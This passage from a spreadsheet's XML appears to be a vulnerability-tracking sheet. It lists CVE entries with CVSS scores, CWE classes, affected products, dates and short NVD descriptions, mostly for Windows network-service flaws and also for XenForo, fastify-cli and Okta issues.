t="inlineStr" /><c r="K335" s="5" t="inlineStr" /><c r="L335" s="5" t="inlineStr" /><c r="M335" s="5" t="inlineStr" /><c r="N335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P335" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q335" s="5" t="inlineStr" /><c r="R335" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S335" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t></is></c></row><row r="336"><c r="A336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C336" s="5" t="inlineStr"><is><t>CVE-2026-69620</t></is></c><c r="D336" s="5" t="n"><v>8.1</v></c><c r="E336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F336" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G336" s="5" t="inlineStr" /><c r="H336" s="5" t="n"><v>0.007</v></c><c r="I336" s="5" t="inlineStr" /><c r="J336" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K336" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L336" s="5" t="inlineStr" /><c r="M336" s="5" t="inlineStr" /><c r="N336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q336" s="5" t="inlineStr" /><c r="R336" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S336" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t></is></c></row><row r="337"><c r="A337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C337" s="5" t="inlineStr"><is><t>CVE-2026-69680</t></is></c><c r="D337" s="5" t="n"><v>8.1</v></c><c r="E337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F337" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G337" s="5" t="inlineStr" /><c r="H337" s="5" t="n"><v>0.003</v></c><c r="I337" s="5" t="inlineStr" /><c r="J337" s="5" t="inlineStr" /><c r="K337" s="5" t="inlineStr" /><c r="L337" s="5" t="inlineStr" /><c r="M337" s="5" t="inlineStr" /><c r="N337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P337" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q337" s="5" t="inlineStr" /><c r="R337" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S337" s="5" t="inlineStr"><is><t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t></is></c></row><row r="338"><c r="A338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C338" s="5" t="inlineStr"><is><t>CVE-2026-69732</t></is></c><c r="D338" s="5" t="n"><v>8.1</v></c><c r="E338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F338" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G338" s="5" t="inlineStr" /><c r="H338" s="5" t="n"><v>0.007</v></c><c r="I338" s="5" t="inlineStr" /><c r="J338" s="5" t="inlineStr" /><c r="K338" s="5" t="inlineStr" /><c r="L338" s="5" t="inlineStr" /><c r="M338" s="5" t="inlineStr" /><c r="N338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P338" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q338" s="5" t="inlineStr" /><c r="R338" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S338" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t></is></c></row><row r="339"><c r="A339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C339" s="5" t="inlineStr"><is><t>CVE-2026-69782</t></is></c><c r="D339" s="5" t="n"><v>8.1</v></c><c r="E339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F339" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G339" s="5" t="inlineStr" /><c r="H339" s="5" t="n"><v>0.006</v></c><c r="I339" s="5" t="inlineStr" /><c r="J339" s="5" t="inlineStr" /><c r="K339" s="5" t="inlineStr" /><c r="L339" s="5" t="inlineStr" /><c r="M339" s="5" t="inlineStr" /><c r="N339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P339" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q339" s="5" t="inlineStr" /><c r="R339" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S339" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t></is></c></row><row r="340"><c r="A340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C340" s="5" t="inlineStr"><is><t>CVE-2026-69786</t></is></c><c r="D340" s="5" t="n"><v>8.1</v></c><c r="E340" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F340" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G340" s="5" t="inlineStr" /><c r="H340" s="5" t="n"><v>0.007</v></c><c r="I340" s="5" t="inlineStr" /><c r="J340" s="5" t="inlineStr" /><c r="K340" s="5" t="inlineStr" /><c r="L340" s="5" t="inlineStr" /><c r="M340" s="5" t="inlineStr" /><c r="N340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P340" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q340" s="5" t="inlineStr" /><c r="R340" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S340" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t></is></c></row><row r="341"><c r="A341" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C341" s="5" t="inlineStr"><is><t>CVE-2026-69813</t></is></c><c r="D341" s="5" t="n"><v>8.1</v></c><c r="E341" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F341" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G341" s="5" t="inlineStr" /><c r="H341" s="5" t="n"><v>0.007</v></c><c r="I341" s="5" t="inlineStr" /><c r="J341" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K341" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L341" s="5" t="inlineStr" /><c r="M341" s="5" t="inlineStr" /><c r="N341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P341" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q341" s="5" t="inlineStr" /><c r="R341" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S341" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t></is></c></row><row r="342"><c r="A342" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C342" s="5" t="inlineStr"><is><t>CVE-2026-69827</t></is></c><c r="D342" s="5" t="n"><v>8.1</v></c><c r="E342" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F342" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G342" s="5" t="inlineStr" /><c r="H342" s="5" t="n"><v>0.005</v></c><c r="I342" s="5" t="inlineStr" /><c r="J342" s="5" t="inlineStr" /><c r="K342" s="5" t="inlineStr" /><c r="L342" s="5" t="inlineStr" /><c r="M342" s="5" t="inlineStr" /><c r="N342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q342" s="5" t="inlineStr" /><c r="R342" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S342" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T342" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t></is></c></row><row r="343"><c r="A343" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C343" s="5" t="inlineStr"><is><t>CVE-2026-69858</t></is></c><c r="D343" s="5" t="n"><v>8.1</v></c><c r="E343" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F343" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G343" s="5" t="inlineStr" /><c r="H343" s="5" t="n"><v>0.007</v></c><c r="I343" s="5" t="inlineStr" /><c r="J343" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K343" s="5" t="inlineStr"><is><t>microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L343" s="5" t="inlineStr" /><c r="M343" s="5" t="inlineStr" /><c r="N343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P343" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q343" s="5" t="inlineStr" /><c r="R343" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S343" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T343" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t></is></c></row><row r="344"><c r="A344" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C344" s="5" t="inlineStr"><is><t>CVE-2026-69989</t></is></c><c r="D344" s="5" t="n"><v>8.1</v></c><c r="E344" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F344" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G344" s="5" t="inlineStr" /><c r="H344" s="5" t="n"><v>0.007</v></c><c r="I344" s="5" t="inlineStr" /><c r="J344" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K344" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L344" s="5" t="inlineStr" /><c r="M344" s="5" t="inlineStr" /><c r="N344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P344" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q344" s="5" t="inlineStr" /><c r="R344" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S344" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T344" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t></is></c></row><row r="345"><c r="A345" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C345" s="5" t="inlineStr"><is><t>CVE-2026-70342</t></is></c><c r="D345" s="5" t="n"><v>8.1</v></c><c r="E345" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F345" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G345" s="5" t="inlineStr" /><c r="H345" s="5" t="n"><v>0.008999999999999999</v></c><c r="I345" s="5" t="inlineStr" /><c r="J345" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K34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45" s="5" t="inlineStr" /><c r="M345" s="5" t="inlineStr" /><c r="N345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P345" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q345" s="5" t="inlineStr" /><c r="R345" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S345" s="5" t="inlineStr"><is><t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T345" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t></is></c></row><row r="346"><c r="A346" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C346" s="5" t="inlineStr"><is><t>CVE-2026-70563</t></is></c><c r="D346" s="5" t="n"><v>8.1</v></c><c r="E346" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F346" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G346" s="5" t="inlineStr" /><c r="H346" s="5" t="n"><v>0.008999999999999999</v></c><c r="I346" s="5" t="inlineStr" /><c r="J346" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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46" s="5" t="inlineStr" /><c r="M346" s="5" t="inlineStr" /><c r="N346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P346" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q346" s="5" t="inlineStr" /><c r="R346" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S346" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T346" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t></is></c></row><row r="347"><c r="A347" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C347" s="5" t="inlineStr"><is><t>CVE-2026-72936</t></is></c><c r="D347" s="5" t="n"><v>8.1</v></c><c r="E347" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F347" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G347" s="5" t="inlineStr" /><c r="H347" s="5" t="n"><v>0.006</v></c><c r="I347" s="5" t="inlineStr" /><c r="J347" s="5" t="inlineStr" /><c r="K347" s="5" t="inlineStr" /><c r="L347" s="5" t="inlineStr" /><c r="M347" s="5" t="inlineStr" /><c r="N347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P347" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q347" s="5" t="inlineStr" /><c r="R347" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S347" s="5" t="inlineStr"><is><t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T347" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t></is></c></row><row r="348"><c r="A348" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C348" s="5" t="inlineStr"><is><t>CVE-2026-72981</t></is></c><c r="D348" s="5" t="n"><v>8.1</v></c><c r="E348" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F348" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G348" s="5" t="inlineStr" /><c r="H348" s="5" t="n"><v>0.005</v></c><c r="I348" s="5" t="inlineStr" /><c r="J348" s="5" t="inlineStr" /><c r="K348" s="5" t="inlineStr" /><c r="L348" s="5" t="inlineStr" /><c r="M348" s="5" t="inlineStr" /><c r="N348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P348" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q348" s="5" t="inlineStr" /><c r="R348" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S348" s="5" t="inlineStr"><is><t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T348" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t></is></c></row><row r="349"><c r="A349" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C349" s="5" t="inlineStr"><is><t>CVE-2026-72987</t></is></c><c r="D349" s="5" t="n"><v>8.1</v></c><c r="E349" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F349" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G349" s="5" t="inlineStr" /><c r="H349" s="5" t="n"><v>0.006</v></c><c r="I349" s="5" t="inlineStr" /><c r="J349" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K349" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L349" s="5" t="inlineStr" /><c r="M349" s="5" t="inlineStr" /><c r="N349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P349" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q349" s="5" t="inlineStr" /><c r="R349" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S349" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T349" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t></is></c></row><row r="350"><c r="A350" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C350" s="5" t="inlineStr"><is><t>CVE-2026-73313</t></is></c><c r="D350" s="5" t="n"><v>8.1</v></c><c r="E350" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G350" s="5" t="inlineStr" /><c r="H350" s="5" t="n"><v>0.004</v></c><c r="I350" s="5" t="inlineStr" /><c r="J350" s="5" t="inlineStr" /><c r="K350" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L350" s="5" t="inlineStr" /><c r="M350" s="5" t="inlineStr" /><c r="N350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P350" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q350" s="5" t="inlineStr" /><c r="R350" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S350" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t></is></c><c r="T350" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t></is></c></row><row r="351"><c r="A351" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C351" s="5" t="inlineStr"><is><t>CVE-2026-75021</t></is></c><c r="D351" s="5" t="n"><v>8.1</v></c><c r="E351" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F351" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G351" s="5" t="inlineStr" /><c r="H351" s="5" t="n"><v>0.004</v></c><c r="I351" s="5" t="inlineStr" /><c r="J351" s="5" t="inlineStr" /><c r="K351" s="5" t="inlineStr" /><c r="L351" s="5" t="inlineStr" /><c r="M351" s="5" t="inlineStr" /><c r="N351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q351" s="5" t="inlineStr" /><c r="R351" s="5" t="inlineStr"><is><t>CWE-1327</t></is></c><c r="S351" s="5" t="inlineStr"><is><t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t></is></c><c r="T351" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t></is></c></row><row r="352"><c r="A352" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C352" s="5" t="inlineStr"><is><t>CVE-2026-77505</t></is></c><c r="D352" s="5" t="n"><v>8.1</v></c><c r="E352" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F352" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G352" s="5" t="inlineStr" /><c r="H352" s="5" t="n"><v>0.005</v></c><c r="I352" s="5" t="inlineStr" /><c r="J352" s="5" t="inlineStr" /><c r="K352" s="5" t="inlineStr" /><c r="L352" s="5" t="inlineStr" /><c r="M352" s="5" t="inlineStr" /><c r="N352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P352" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q352" s="5" t="inlineStr" /><c r="R352" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S352" s="5" t="inlineStr"><is><t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T352" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t></is></c></row><row r="353"><c r="A353" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C353" s="5" t="inlineStr"><is><t>CVE-2026-78444</t></is></c><c r="D353" s="5" t="n"><v>8.1</v></c><c r="E353" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F353" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G353" s="5" t="inlineStr" /><c r="H353" s="5" t="n"><v>0.005</v></c><c r="I353" s="5" t="inlineStr" /><c r="J353" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K353" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L353" s="5" t="inlineStr" /><c r="M353" s="5" t="inlineStr" /><c r="N353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q353" s="5" t="inlineStr" /><c r="R353" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S353" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t></is></c></row><row r="354"><c r="A354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C354" s="5" t="inlineStr"><is><t>CVE-2026-78449</t></is></c><c r="D354" s="5" t="n"><v>8.1</v></c><c r="E354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F354" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G354" s="5" t="inlineStr" /><c r="H354" s="5" t="n"><v>0.005</v></c><c r="I354" s="5" t="inlineStr" /><c r="J354" s="5" t="inlineStr" /><c r="K354" s="5" t="inlineStr" /><c r="L354" s="5" t="inlineStr" /><c r="M354" s="5" t="inlineStr" /><c r="N354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q354" s="5" t="inlineStr" /><c r="R354" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S354" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t></is></c></row><row r="355"><c r="A355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C355" s="5" t="inlineStr"><is><t>CVE-2026-78450</t></is></c><c r="D355" s="5" t="n"><v>8.1</v></c><c r="E355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F355" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G355" s="5" t="inlineStr" /><c r="H355" s="5" t="n"><v>0.005</v></c><c r="I355" s="5" t="inlineStr" /><c r="J355" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K355" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L355" s="5" t="inlineStr" /><c r="M355" s="5" t="inlineStr" /><c r="N355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P355" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q355" s="5" t="inlineStr" /><c r="R355" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S355" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t></is></c></row><row r="356"><c r="A356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C356" s="5" t="inlineStr"><is><t>CVE-2026-78626</t></is></c><c r="D356" s="5" t="n"><v>8.1</v></c><c r="E356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F356" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G356" s="5" t="inlineStr" /><c r="H356" s="5" t="n"><v>0.002</v></c><c r="I356" s="5" t="inlineStr" /><c r="J356" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K356" s="5" t="inlineStr" /><c r="L356" s="5" t="inlineStr" /><c r="M356" s="5" t="inlineStr" /><c r="N356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P356" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q356" s="5" t="inlineStr" /><c r="R356" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S356" s="5" t="inlineStr"><is><t>The Okta Access Gateway improperly handles input sanitization and regular expression evaluation within its Protected Rule authorization check, resulting in an authorization bypass when an administrator has explicitly configured a Protected Rule policy on one or more application resources.</t></is></c><c r="T356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t></is></c></row><row r="357"><c r="A357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B357" s="5" 